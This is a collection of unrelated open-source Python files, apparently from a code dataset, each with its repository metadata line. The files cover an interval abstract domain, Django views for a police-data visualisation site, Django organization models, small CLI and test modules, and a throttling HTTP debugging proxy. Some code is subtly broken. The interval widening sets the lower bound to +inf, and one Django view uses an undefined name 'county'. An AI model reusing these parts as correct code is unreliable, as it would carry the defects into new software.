self.interval = (self.lower - other.upper, self.upper - other.lower)
return self
@_auto_convert_numbers
@_check_types
def mult(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
else:
comb = [self.lower * other.lower, self.lower * other.upper, self.upper * other.lower,
self.upper * other.upper]
self.interval = (min(comb), max(comb))
return self
def negate(self) -> 'Interval':
if self.empty():
return self
else:
self.interval = (-self.upper, -self.lower)
return self
# overload operators (do not mutate self, return a modified copy)
def __pos__(self):
copy = deepcopy(self)
return copy
def __neg__(self):
copy = deepcopy(self)
return copy.negate()
def __add__(self, other):
copy = deepcopy(self)
return copy.add(other)
def __sub__(self, other):
copy = deepcopy(self)
return copy.sub(other)
def __mul__(self, other):
copy = deepcopy(self)
return copy.mult(other)
class IntervalLattice(Interval, BottomMixin):
@staticmethod
def from_constant(constant):
interval_lattice = IntervalLattice(constant, constant)
return interval_lattice
def __repr__(self):
if self.is_bottom():
return "⊥"
else:
return super().__repr__()
def top(self) -> 'IntervalLattice':
self.lower = -inf
self.upper = inf
return self
def is_top(self) -> bool:
return self._lower == -inf and self._upper == inf
def is_bottom(self) -> bool:
# we have to check if interval is empty, or got empty by an operation on this interval
if self.empty():
self.bottom()
return super().is_bottom()
def _less_equal(self, other: 'IntervalLattice') -> bool:
# NOTE: do not use less equal operator of plain interval since that has different semantics (every value in
# interval is less equal than any value in other interval)
return other.lower <= self.lower and self.upper <= other.upper
def _meet(self, other: 'IntervalLattice'):
self.lower = max(self.lower, other.lower)
self.upper = min(self.upper, other.upper)
return self
def _join(self, other: 'IntervalLattice') -> 'IntervalLattice':
self.lower = min(self.lower, other.lower)
self.upper = max(self.upper, other.upper)
return self
def _widening(self, other: 'IntervalLattice'):
if other.lower < self.lower:
self.lower = inf
if other.upper > self.upper:
self.upper = inf
return self
@classmethod
def evaluate(cls, expr: Expression):
"""Evaluates an expression without variables, interpreting constants in the interval domain.
If this method encounters any variables, it raises a ``ValueError``.
"""
return cls._visitor.visit(expr)
# noinspection PyPep8Naming
class Visitor(ExpressionVisitor):
"""A visitor to abstractly evaluate an expression (without variables) in the interval domain."""
def generic_visit(self, expr, *args, **kwargs):
raise ValueError(
f"{type(self)} does not support generic visit of expressions! "
f"Define handling for expression {type(expr)} explicitly!")
# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_Index(self, _: Index, *args, **kwargs):
return IntervalLattice().top()
def visit_BinaryArithmeticOperation(self, expr: BinaryArithmeticOperation, *args, **kwargs):
l = self.visit(expr.left, *args, **kwargs)
r = self.visit(expr.right, *args, **kwargs)
if expr.operator == BinaryArithmeticOperation.Operator.Add:
return l.add(r)
elif expr.operator == BinaryArithmeticOperation.Operator.Sub:
return l.sub(r)
elif expr.operator == BinaryArithmeticOperation.Operator.Mult:
return l.mult(r)
elif expr.operator == BinaryArithmeticOperation.Operator.Div:
return l.top()
else:
raise ValueError(f"Binary operator '{str(expr.operator)}' is not supported!")
def visit_UnaryArithmeticOperation(self, expr: UnaryArithmeticOperation, *args, **kwargs):
r = self.visit(expr.expression, *args, **kwargs)
if expr.operator == UnaryArithmeticOperation.Operator.Add:
return r
elif expr.operator == UnaryArithmeticOperation.Operator.Sub:
return r.negate()
else:
raise ValueError(f"Unary Operator {expr.operator} is not supported!")
# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_Literal(self, expr: Literal, *args, **kwargs):
if expr.typ == int:
c = int(expr.val)
return IntervalLattice(c, c)
else:
raise ValueError(f"Literal type {expr.typ} is not supported!")
# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_Input(self, _: Input, *args, **kwargs):
return IntervalLattice().top()
# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_ListInput(self, _: ListInput, *args, **kwargs):
return IntervalLattice().top()
def visit_ListDisplay(self, expr: ListDisplay, *args, **kwargs):
# find the big join of the intervals of all items of the list display expression
intervals = map(lambda item: self.visit(item, *args, **kwargs), expr.items)
return IntervalLattice().bottom().big_join(intervals)
_visitor = Visitor() # static class member shared between all instances
class IntervalDomain(Store, NumericalMixin, State):
def __init__(self, variables: List[VariableIdentifier]):
super().__init__(variables, {int: lambda _: IntervalLattice(), list: lambda _: IntervalLattice()})
def forget(self, var: VariableIdentifier):
self.store[var].top()
def set_bounds(self, var: VariableIdentifier, lower: int, upper: int):
self.store[var].lower = lower
self.store[var].upper = upper
def get_bounds(self, var: VariableIdentifier):
return self.store[var].lower, self.store[var].upper
def set_interval(self, var: VariableIdentifier, interval: IntervalLattice):
self.store[var].lower = interval.lower
self.store[var].upper = interval.upper
def set_lb(self, var: VariableIdentifier, constant):
self.store[var].lower = constant
def set_ub(self, var: VariableIdentifier, constant):
self.store[var].upper = constant
def evaluate(self, expr: Expression):
interval = IntervalDomain._visitor.visit(expr, self)
return interval
def _access_variable(self, variable: VariableIdentifier) -> Set[Expression]:
return {variable}
def _assign_variable(self, left: Expression, right: Expression) -> 'IntervalDomain':
if isinstance(left, VariableIdentifier):
if left.typ == int:
self.store[left] = IntervalDomain._visitor.visit(right, self)
else:
raise NotImplementedError("Interval domain does only support assignments to variables so far.")
return self
def _assume(self, condition: Expression) -> 'IntervalDomain':
# TODO implement this
return self
def _evaluate_literal(self, literal: Expression) -> Set[Expression]:
return {literal}
def enter_loop(self):
return self # nothing to be done
def exit_loop(self):
return self # nothing to be done
def enter_if(self):
return self # nothing to be done
def exit_if(self):
return self # nothing to be done
def _output(self, output: Expression) -> 'IntervalDomain':
return self # nothing to be done
def _substitute_variable(self, left: Expression, right: Expression):
raise NotImplementedError("Interval domain does not yet support variable substitution.")
# noinspection PyPep8Naming
class Visitor(IntervalLattice.Visitor):
"""A visitor to abstractly evaluate an expression (with variables) in the interval domain."""
# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_VariableIdentifier(self, expr: VariableIdentifier, interval_store, *args, **kwargs):
if expr.typ == int:
# copy the lattice element, since evaluation should not modify elements
return deepcopy(interval_store.store[expr])
else:
return IntervalLattice().top()
_visitor = Visitor() # static class member shared between all instances
| gitsimon/spadup-lyra | abstract_domains/numerical/interval_domain.py | Python | mpl-2.0 | 13,333 | 0.001876 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010-2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import gettext
gettext.install('glance', unicode=1)
| tylertian/Openstack | openstack F/glance/glance/__init__.py | Python | apache-2.0 | 733 | 0 |
import operator
import json
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from .models import County, GuardianCounted, Geo, Item, Station, Crime, State
from .utilities import states, get_dollars_donated_by_year, format_money
from .utilities import get_state_deaths, get_state_deaths_over_time, make_state_categories
from .utilities import get_state_violent_crime, get_county_deaths, create_counties_list
from .utilities import create_county_crime, make_per_capita_guns, state_abbrev
from .utilities import get_categories_per_capita, format_integer, get_state_property_crime
from .utilities import get_prop_crime_data, get_prop_crime_data_per_cap, format_float
from .utilities import get_viol_crime_data, get_viol_crime_data_per_cap, get_fatal_encounters
from .utilities import get_fatal_encounters_per_cap, get_military_value
from .utilities import get_military_value_per_cap
from rest_framework import viewsets
from .serializers import StateSerializer
from django.db.models import Sum, Func, Count, F
from nvd3 import *
from django.utils.safestring import mark_safe
class StateViewSet(viewsets.ReadOnlyModelViewSet):
queryset = State.objects.all().order_by('state')
serializer_class = StateSerializer
def index(request):
state_list = sorted(states.items(), key=operator.itemgetter(1))
context = {'states': state_list}
return render(request, "visualize/index.html", context)
def state(request, state):
state = state.upper()
state_obj = get_object_or_404(State, state=state)
state_deaths = get_state_deaths(state)
category_data, categories = make_state_categories(state)
ten_thirty_three_total = Item.objects.filter(state=state).aggregate(Sum('Total_Value'))['Total_Value__sum']
twenty_fifteen_kills = GuardianCounted.objects.filter(state=county).count()
twenty_fifteen_population = County.objects.filter(state=states[state]).aggregate(Sum('pop_est_2015'))['pop_est_2015__sum']
context = {'state': state,
'state_num': state_deaths['2015 {} Fatal Encounters'.format(states[state])],
'average': state_deaths['2015 Average Fatal Encounters'],
'long_state_name': states[state],
'counties_list': create_counties_list(state),
'categories': categories,
'twenty_fourteen_violent': format_integer(state_obj.total_violent_crime),
'twenty_fourteen_property': format_integer(state_obj.total_property_crime),
'twenty_fifteen_kills': str(twenty_fifteen_kills),
'ten_thirty_three_total': format_money(ten_thirty_three_total),
'twenty_fifteen_population': format_integer(twenty_fifteen_population),
}
return render(request, "visualize/state.html", context)
def state_json(request, state):
state = state.upper()
state_obj = get_object_or_404(State, state=state)
state_deaths = get_state_deaths(state)
category_data, category_nums = make_state_categories(state)
per_capita_guns, per_capita_nums = make_per_capita_guns(state)
avg_violent_crime, per_capita_violent_crime = get_state_violent_crime(state_obj)
avg_property_crime, per_capita_property_crime = get_state_property_crime(state_obj)
data = {'state_deaths': [dict(key='State Deaths', values=[dict(label=key, value=value) for key, value in state_deaths.items()])],
'deaths_over_time': get_state_deaths_over_time(state),
'category_data': category_data,
'categories_per_capita': get_categories_per_capita(state, category_data),
'dollars_by_year': get_dollars_donated_by_year(state),
'avg_violent_crime': avg_violent_crime,
'per_capita_violent_crime': per_capita_violent_crime,
'per_capita_rifles': per_capita_guns,
'per_capita_nums': per_capita_nums,
'category_nums': category_nums,
'avg_property_crime': avg_property_crime,
'per_capita_property_crime': per_capita_property_crime}
return HttpResponse(json.dumps(data), content_type='application/json')
def county(request, county):
county_obj = County.objects.get(id=county)
total_num_counties_in_country = 3112
state = state_abbrev[county_obj.state]
state_obj = State.objects.get(state=state)
num_counties_in_state = len(County.objects.filter(state=county_obj.state))
county_pop = county_obj.pop_est_2015
state_pop = (State.objects.get(state=state)).total_population_twentyfifteen
us_population = State.objects.all().aggregate(Sum('total_population_twentyfifteen'))['total_population_twentyfifteen__sum']
county_violent = int(Crime.objects.filter(year='2014-01-01', county=county).aggregate(Sum('violent_crime'))['violent_crime__sum'])
county_property = int(Crime.objects.filter(year='2014-01-01', county=county).aggregate(Sum('property_crime'))['property_crime__sum'])
county_military_value = int(Item.objects.filter(county=county).aggregate(Sum('Total_Value'))['Total_Value__sum'])
county_fatal_encounters = int(GuardianCounted.objects.filter(county=county, date__year=2015).count())
county_crime = [county_violent, county_property]
average_state_crime_prop = get_prop_crime_data(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_state_crime_prop_per_cap = get_prop_crime_data_per_cap(
county_property, state, county_obj, us_population,
state_pop, county_pop, state_obj)
average_state_crime_viol = get_viol_crime_data(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_state_crime_viol_per_cap = get_viol_crime_data_per_cap(
county_violent, state, county_obj, us_population,
state_pop, county_pop, state_obj)
average_fatal_encounters = get_fatal_encounters(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_fatal_encounters_per_cap = get_fatal_encounters_per_cap(county_fatal_encounters, us_population,
state_pop, state, county_obj, state_obj, county_pop)
average_military_value = get_military_value(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_military_value_per_cap = get_military_value_per_cap(us_population, state_pop, county_pop,
county_military_value, state_obj, county_obj, state)
context = {
'military_value': mark_safe(json.dumps(average_military_value)),
'military_value_per_cap': mark_safe(json.dumps(average_military_value_per_cap)),
'prop_crime': mark_safe(json.dumps(average_state_crime_prop)),
"prop_crime_per_cap": mark_safe(json.dumps(average_state_crime_prop_per_cap)),
'viol_crime': mark_safe(json.dumps(average_state_crime_viol)),
"viol_crime_per_cap": mark_safe(json.dumps(average_state_crime_viol_per_cap)),
'average_fatal_encounters': mark_safe(json.dumps(average_fatal_encounters)),
'average_fatal_encounters_per_cap': mark_safe(json.dumps(average_fatal_encounters_per_cap)),
'county': county,
'county_obj': county_obj,
'twenty_fourteen_violent': format_integer(county_violent),
'twenty_fourteen_property': format_integer(county_property),
'twenty_fifteen_kills': format_integer(county_fatal_encounters),
'ten_thirty_three_total': format_money(county_military_value),
'counties_list': create_counties_list(state),
'county_pop_twenty_fifteen': format_integer(county_obj.pop_est_2015),
'state_abbrev': state,
}
return render(request, "visualize/county.html", context)
def about(request):
return render(request, "visualize/about.html")
| Bringing-Buzzwords-Home/bringing_buzzwords_home | visualize/views.py | Python | mit | 8,056 | 0.005462 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 1998-2021 Stephane Galland <galland@arakhne.org>
#
# This program is free library; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or any later version.
#
# This library is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; see the file COPYING. If not,
# write to the Free Software Foundation, Inc., 59 Temple Place - Suite
# 330, Boston, MA 02111-1307, USA.
import os
import logging
from autolatex2.cli.main import AbstractMakerAction
from autolatex2.utils.extprint import eprint
import gettext
_T = gettext.gettext
class MakerAction(AbstractMakerAction):
id = 'showconfigfiles'
help = _T('Display the list of the detected configuration files that will be read by autolatex')
def run(self, args) -> bool:
'''
Callback for running the command.
:param args: the arguments.
:return: True to continue process. False to stop the process.
'''
system_path = self.configuration.systemConfigFile
if system_path is not None:
if os.path.isfile(system_path):
if os.access(system_path, os.R_OK):
eprint(system_path)
else:
logging.error(_T("%s (unreable)") % (system_path))
else:
logging.error(_T("%s (not found)") % (system_path))
user_path = self.configuration.userConfigFile
if user_path is not None:
if os.path.isfile(user_path):
if os.access(user_path, os.R_OK):
eprint(user_path)
else:
logging.error(_T("%s (unreadable)") % (user_path))
else:
logging.error(_T("%s (not found)") % (user_path))
document_directory = self.configuration.documentDirectory
if document_directory is None:
logging.error(_T("Cannot detect document directory"))
else:
doc_path = self.configuration.makeDocumentConfigFilename(document_directory)
if doc_path is not None:
if os.path.isfile(doc_path):
if os.access(doc_path, os.R_OK):
eprint(doc_path)
else:
logging.error(_T("%s (unreadable)") % (doc_path))
else:
logging.error(_T("%s (not found)") % (doc_path))
return True
| gallandarakhneorg/autolatex | src/autolatex2/cli/commands/showconfigfiles.py | Python | lgpl-3.0 | 2,465 | 0.017039 |
import hashlib
from django.contrib.auth.models import Group
from django.db import models
USER_MODEL = 'auth.User'
class Organization( Group ):
'''
Umbrella object with which users are associated.
An organization can have multiple users.
'''
gravatar = models.EmailField( blank=True )
owner = models.ForeignKey( USER_MODEL )
users = models.ManyToManyField( USER_MODEL,
through='OrganizationUser',
related_name='organization_users' )
class Meta:
ordering = [ 'name' ]
verbose_name = 'organization'
verbose_name_plural = 'organizations'
def __unicode__( self ):
return self.name
def icon( self ):
if len( self.gravatar ) == 0:
return '//gravatar.com/avatar/0000000000000000000000000000000?d=mm'
m = hashlib.md5()
m.update( self.gravatar.strip().lower() )
return '//gravatar.com/avatar/%s' % ( m.hexdigest() )
def add_user( self, user ):
'''
Add a ( pending ) user to this organization.
'''
pending_user = OrganizationUser( user=user,
organization=self,
pending=True,
is_admin=False )
pending_user.save()
return pending_user
def has_user( self, user ):
org_user = OrganizationUser.objects.filter( user=user,
organization=self )
return len( org_user ) > 0
class OrganizationUser( models.Model ):
'''
ManyToMany through field relating Users to Organizations
Since it is possible for a User to be a member of multiple orgs this
class relates the OrganizationUser ot the User model using a ForeignKey
relationship, rather than a OneToOne relationship.
'''
user = models.ForeignKey( USER_MODEL,
related_name='organization_user' )
organization = models.ForeignKey( Organization,
related_name='organization_user' )
pending = models.BooleanField( default=True )
is_admin = models.BooleanField( default=False )
class Meta:
ordering = [ 'organization', 'user' ]
unique_together = ( 'user', 'organization' )
verbose_name = 'organization user'
verbose_name_plural = 'organization users'
def __unicode__( self ):
return '%s ( %s )' % ( self.user.username, self.organization.name )
| DHLabs/keep | keep_backend/organizations/models.py | Python | mit | 2,600 | 0.018846 |
from __future__ import absolute_import, unicode_literals
import sys
if sys.version_info > (3,):
from shutil import which
else:
from distutils.spawn import find_executable as which
from virtualenv.activation import NushellActivator
from virtualenv.info import IS_WIN
def test_nushell(activation_tester_class, activation_tester):
class Nushell(activation_tester_class):
def __init__(self, session):
cmd = which("nu")
if cmd is None and IS_WIN:
cmd = "c:\\program files\\nu\\bin\\nu.exe"
super(Nushell, self).__init__(NushellActivator, session, cmd, "activate.nu", "nu")
self.unix_line_ending = not IS_WIN
def print_prompt(self):
return r"echo $virtual_prompt; printf '\n'"
activation_tester(Nushell)
| pypa/virtualenv | tests/unit/activation/test_nushell.py | Python | mit | 816 | 0.001225 |
#! /usr/bin/env python
# throxy.py - HTTP proxy to simulate dial-up access
# Copyright (c) 2007 Johann C. Rocholl <johann@browsershots.org>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Throxy: throttling HTTP proxy in one Python file
To use it, run this script on your local machine and adjust your
browser settings to use 127.0.0.1:8080 as HTTP proxy.
* Simulate a slow connection (like dial-up).
* Adjustable bandwidth limit for download and upload.
* Optionally dump HTTP headers and content for debugging.
* Decompress gzip content encoding for debugging.
* Multiple connections, without threads (uses asyncore).
* Only one source file, written in pure Python.
Simulate analog modem connection:
$ python throxy.py -u28.8 -d57.6
Show all HTTP headers (request & reply):
$ python throxy.py -qrs
Dump HTTP headers and content to a file, without size limits:
$ python throxy.py -rsRS -l0 -L0 -g0 > dump.txt
Tell command line tools to use the proxy:
$ export http_proxy=127.0.0.1:8080
"""
import sys
import asyncore
import socket
import time
import gzip
import struct
import cStringIO
import re
__revision__ = '$Rev: 1180 $'
KILO = 1000 # decimal or binary kilo
request_match = re.compile(r'^([A-Z]+) (\S+) (HTTP/\S+)$').match
def debug(message, newline=True):
"""Print message to stderr and clear the rest of the line."""
if options.quiet:
return
if newline:
message = message.ljust(79) + '\n'
sys.stderr.write(message)
class Header:
"""HTTP (request or reply) header parser."""
def __init__(self):
self.data = ''
self.lines = []
self.complete = False
def append(self, new_data):
"""
Add more data to the header.
Any data after the end of the header is returned, as it may
contain content, or even the start of the next request.
"""
self.data += new_data
while not self.complete:
newline = self.data.find('\n')
if newline < 0:
break # No complete line found
line = self.data[:newline].rstrip('\r')
if len(line):
self.lines.append(line)
else:
self.complete = True
self.content_type = self.extract('Content-Type')
self.content_encoding = self.extract('Content-Encoding')
if self.content_encoding == 'gzip':
self.gzip_data = cStringIO.StringIO()
self.data = self.data[newline+1:]
if self.complete:
rest = self.data
self.data = ''
return rest
else:
return ''
def extract(self, name, default=''):
"""Extract a header field."""
name = name.lower()
for line in self.lines:
if not line.count(':'):
continue
key, value = line.split(':', 1)
if key.lower() == name:
return value.strip()
return default
def extract_host(self):
"""Extract host and perform DNS lookup."""
self.host = self.extract('Host')
if self.host is None:
return
if self.host.count(':'):
self.host_name, self.host_port = self.host.split(':')
self.host_port = int(self.host_port)
else:
self.host_name = self.host
self.host_port = 80
self.host_ip = socket.gethostbyname(self.host_name)
self.host_addr = (self.host_ip, self.host_port)
def extract_request(self):
"""Extract path from HTTP request."""
match = request_match(self.lines[0])
if not match:
raise ValueError("malformed request line " + self.lines[0])
self.method, self.url, self.proto = match.groups()
if self.method.upper() == 'CONNECT':
raise ValueError("method CONNECT is not supported")
prefix = 'http://' + self.host
if not self.url.startswith(prefix):
raise ValueError("URL doesn't start with " + prefix)
self.path = self.url[len(prefix):]
def dump_title(self, from_addr, to_addr, direction, what):
"""Print a title before dumping headers or content."""
print '==== %s %s (%s:%d => %s:%d) ====' % (
direction, what,
from_addr[0], from_addr[1],
to_addr[0], to_addr[1])
def dump(self, from_addr, to_addr, direction='sending'):
"""Dump header lines to stdout."""
self.dump_title(from_addr, to_addr, direction, 'headers')
print '\n'.join(self.lines)
print
def dump_content(self, content, from_addr, to_addr, direction='sending'):
"""Dump content to stdout."""
self.dump_title(from_addr, to_addr, direction, 'content')
if self.content_encoding:
print "(%d bytes of %s with %s encoding)" % (len(content),
repr(self.content_type), repr(self.content_encoding))
else:
print "(%d bytes of %s)" % (len(content), repr(self.content_type))
if self.content_encoding == 'gzip':
if options.gzip_size_limit == 0 or \
self.gzip_data.tell() < options.gzip_size_limit:
self.gzip_data.write(content)
try:
content = self.gunzip()
except IOError, error:
content = 'Could not gunzip: ' + str(error)
if self.content_type.startswith('text/'):
limit = options.text_dump_limit
elif self.content_type.startswith('application/') and \
self.content_type.count('xml'):
limit = options.text_dump_limit
else:
limit = options.data_dump_limit
content = repr(content)
if len(content) < limit or limit == 0:
print content
else:
print content[:limit] + '(showing only %d bytes)' % limit
print
def gunzip(self):
"""Decompress gzip content."""
if options.gzip_size_limit and \
self.gzip_data.tell() > options.gzip_size_limit:
raise IOError("More than %d bytes" % options.gzip_size_limit)
self.gzip_data.seek(0) # Seek to start of data
try:
gzip_file = gzip.GzipFile(
fileobj=self.gzip_data, mode='rb')
result = gzip_file.read()
gzip_file.close()
except struct.error:
raise IOError("Caught struct.error from gzip module")
self.gzip_data.seek(0, 2) # Seek to end of data
return result
class Throttle:
"""Bandwidth limit tracker."""
def __init__(self, kbps, interval=1.0):
self.bytes_per_second = int(kbps * KILO) / 8
self.interval = interval
self.fragment_size = min(512, self.bytes_per_second / 4)
self.transmit_log = []
self.weighted_throughput = 0.0
self.real_throughput = 0
self.last_updated = time.time()
def update_throughput(self, now):
"""Update weighted and real throughput."""
self.weighted_throughput = 0.0
self.real_throughput = 0
for timestamp, bytes in self.transmit_log:
# Event's age in seconds
age = now - timestamp
if age > self.interval:
continue
# Newer entries count more
weight = 2.0 * (self.interval - age) / self.interval
self.weighted_throughput += bytes * weight
self.real_throughput += bytes
self.last_updated = now
def trim_log(self):
"""Forget transmit log entries that are too old."""
now = time.time()
horizon = now - self.interval
popped = 0
while len(self.transmit_log) and self.transmit_log[0][0] <= horizon:
self.transmit_log.pop(0)
popped += 1
if popped or now - self.last_updated > 0.1:
self.update_throughput(now)
def log_sent_bytes(self, bytes):
"""Add timestamp and byte count to transmit log."""
self.transmit_log.append((time.time(), bytes))
self.update_throughput(time.time())
def sendable(self):
"""How many bytes can we send without exceeding bandwidth?"""
self.trim_log()
weighted_bytes = int(self.weighted_throughput / self.interval)
return max(0, self.bytes_per_second - weighted_bytes)
def weighted_kbps(self):
"""Compute recent bandwidth usage, in kbps."""
self.trim_log()
return 8 * self.weighted_throughput / float(KILO) / self.interval
def real_kbps(self):
"""Compute recent bandwidth usage, in kbps."""
self.trim_log()
return 8 * self.real_throughput / float(KILO) / self.interval
class ThrottleSender(asyncore.dispatcher):
"""Data connection with send buffer and bandwidth limit."""
def __init__(self, throttle, channel=None):
self.throttle = throttle
if channel is None:
asyncore.dispatcher.__init__(self)
else:
asyncore.dispatcher.__init__(self, channel)
self.buffer = []
self.should_close = False
def writable(self):
"""Check if this channel is ready to write some data."""
return (len(self.buffer) and
self.throttle.sendable() / 2 > self.throttle.fragment_size)
def handle_write(self):
"""Write some data to the socket."""
max_bytes = self.throttle.sendable() / 2
if max_bytes < self.throttle.fragment_size:
return
bytes = self.send(self.buffer[0][:max_bytes])
self.throttle.log_sent_bytes(bytes)
if bytes == len(self.buffer[0]):
self.buffer.pop(0)
else:
self.buffer[0] = self.buffer[0][bytes:]
self.check_close()
def check_close(self):
"""Close if requested and all data was sent."""
if self.should_close and len(self.buffer) == 0:
self.close()
class ClientChannel(ThrottleSender):
"""A client connection."""
def __init__(self, channel, addr, download_throttle, upload_throttle):
ThrottleSender.__init__(self, download_throttle, channel)
self.upload_throttle = upload_throttle
self.addr = addr
self.header = Header()
self.content_length = 0
self.server = None
self.handle_connect()
def readable(self):
"""Check if this channel is ready to receive some data."""
return self.server is None or len(self.server.buffer) == 0
def handle_read(self):
"""Read some data from the client."""
data = self.recv(8192)
while len(data):
if self.content_length:
bytes = min(self.content_length, len(data))
self.server.buffer.append(data[:bytes])
if options.dump_send_content:
self.header.dump_content(
data[:bytes], self.addr, self.header.host_addr)
data = data[bytes:]
self.content_length -= bytes
if not len(data):
break
if self.header.complete and self.content_length == 0:
debug("client %s:%d sends a new request" % self.addr)
self.header = Header()
self.server = None
data = self.header.append(data)
if self.header.complete:
self.content_length = int(
self.header.extract('Content-Length', 0))
self.header.extract_host()
if options.dump_send_headers:
self.header.dump(self.addr, self.header.host_addr)
self.server = ServerChannel(
self, self.header, self.upload_throttle)
def handle_connect(self):
"""Print connect message to stderr."""
debug("client %s:%d connected" % self.addr)
def handle_close(self):
"""Print disconnect message to stderr."""
self.close()
debug("client %s:%d disconnected" % self.addr)
class ServerChannel(ThrottleSender):
"""Connection to HTTP server."""
def __init__(self, client, header, upload_throttle):
ThrottleSender.__init__(self, upload_throttle)
self.client = client
self.addr = header.host_addr
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connect(self.addr)
self.send_header(header)
self.header = Header()
def send_header(self, header):
"""Send HTTP request header to the server."""
header.extract_request()
self.send_line(' '.join(
(header.method, header.path, header.proto)))
self.send_line('Connection: close')
for line in header.lines[1:]:
if not (line.startswith('Keep-Alive: ') or
line.startswith('Connection: ') or
line.startswith('Proxy-')):
self.send_line(line)
self.send_line('')
def send_line(self, line):
"""Send one line of the request header to the server."""
self.buffer.append(line + '\r\n')
def receive_header(self, header):
"""Send HTTP reply header to the client."""
for line in header.lines:
if not (line.startswith('Keep-Alive: ') or
line.startswith('Connection: ') or
line.startswith('Proxy-')):
self.receive_line(line)
self.receive_line('')
def receive_line(self, line):
"""Send one line of the reply header to the client."""
self.client.buffer.append(line + '\r\n')
def readable(self):
"""Check if this channel is ready to receive some data."""
return len(self.client.buffer) == 0
def handle_read(self):
"""Read some data from the server."""
data = self.recv(8192)
if not self.header.complete:
data = self.header.append(data)
if self.header.complete:
if options.dump_recv_headers:
self.header.dump(self.addr, self.client.addr, 'receiving')
self.receive_header(self.header)
if self.header.complete and len(data):
if options.dump_recv_content:
self.header.dump_content(
data, self.addr, self.client.addr, 'receiving')
self.client.buffer.append(data)
def handle_connect(self):
"""Print connect message to stderr."""
debug("server %s:%d connected" % self.addr)
def handle_close(self):
"""Print disconnect message to stderr."""
self.close()
debug("server %s:%d disconnected" % self.addr)
if self.header.extract('Connection').lower() == 'close':
self.client.should_close = True
self.client.check_close()
class ProxyServer(asyncore.dispatcher):
"""Listen for client connections."""
def __init__(self):
asyncore.dispatcher.__init__(self)
self.download_throttle = Throttle(options.download)
self.upload_throttle = Throttle(options.upload)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.addr = (options.interface, options.port)
self.bind(self.addr)
self.listen(5)
debug("listening on %s:%d" % self.addr)
def readable(self):
debug('%8.1f kbps up %8.1f kbps down\r' % (
self.upload_throttle.real_kbps(),
self.download_throttle.real_kbps(),
), newline=False)
return True
def handle_accept(self):
"""Accept a new connection from a client."""
channel, addr = self.accept()
if addr[0] == '127.0.0.1' or options.allow_remote:
ClientChannel(channel, addr,
self.download_throttle, self.upload_throttle)
else:
channel.close()
debug("remote client %s:%d not allowed" % addr)
if __name__ == '__main__':
from optparse import OptionParser
version = '%prog ' + __revision__.strip('$').replace('Rev: ', 'r')
parser = OptionParser(version=version)
parser.add_option('-i', dest='interface', action='store', type='string',
metavar='<ip>', default='',
help="listen on this interface only (default all)")
parser.add_option('-p', dest='port', action='store', type='int',
metavar='<port>', default=8080,
help="listen on this port number (default 8080)")
parser.add_option('-d', dest='download', action='store', type='float',
metavar='<kbps>', default=28.8,
help="download bandwidth in kbps (default 28.8)")
parser.add_option('-u', dest='upload', action='store', type='float',
metavar='<kbps>', default=28.8,
help="upload bandwidth in kbps (default 28.8)")
parser.add_option('-o', dest='allow_remote', action='store_true',
help="allow remote clients (WARNING: open proxy)")
parser.add_option('-q', dest='quiet', action='store_true',
help="don't show connect and disconnect messages")
parser.add_option('-s', dest='dump_send_headers', action='store_true',
help="dump headers sent to server")
parser.add_option('-r', dest='dump_recv_headers', action='store_true',
help="dump headers received from server")
parser.add_option('-S', dest='dump_send_content', action='store_true',
help="dump content sent to server")
parser.add_option('-R', dest='dump_recv_content', action='store_true',
help="dump content received from server")
parser.add_option('-l', dest='text_dump_limit', action='store',
metavar='<bytes>', type='int', default=1024,
help="maximum length of dumped text content (default 1024)")
parser.add_option('-L', dest='data_dump_limit', action='store',
metavar='<bytes>', type='int', default=256,
help="maximum length of dumped binary content (default 256)")
parser.add_option('-g', dest='gzip_size_limit', action='store',
metavar='<bytes>', type='int', default=8192,
help="maximum size for gzip decompression (default 8192)")
options, args = parser.parse_args()
proxy = ProxyServer()
